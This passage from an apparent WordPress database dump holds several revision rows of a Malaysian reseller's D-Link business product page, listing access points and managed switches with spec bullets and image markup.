style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports</p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Cable diagnostics function to help troubleshooting wiring problem</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 15:06:43','2019-09-25 07:06:43','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3410,1,'2019-09-25 14:37:00','2019-09-25 06:37:00','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:37:00','2019-09-25 06:37:00','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3411,1,'2019-09-25 14:44:29','2019-09-25 06:44:29','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment 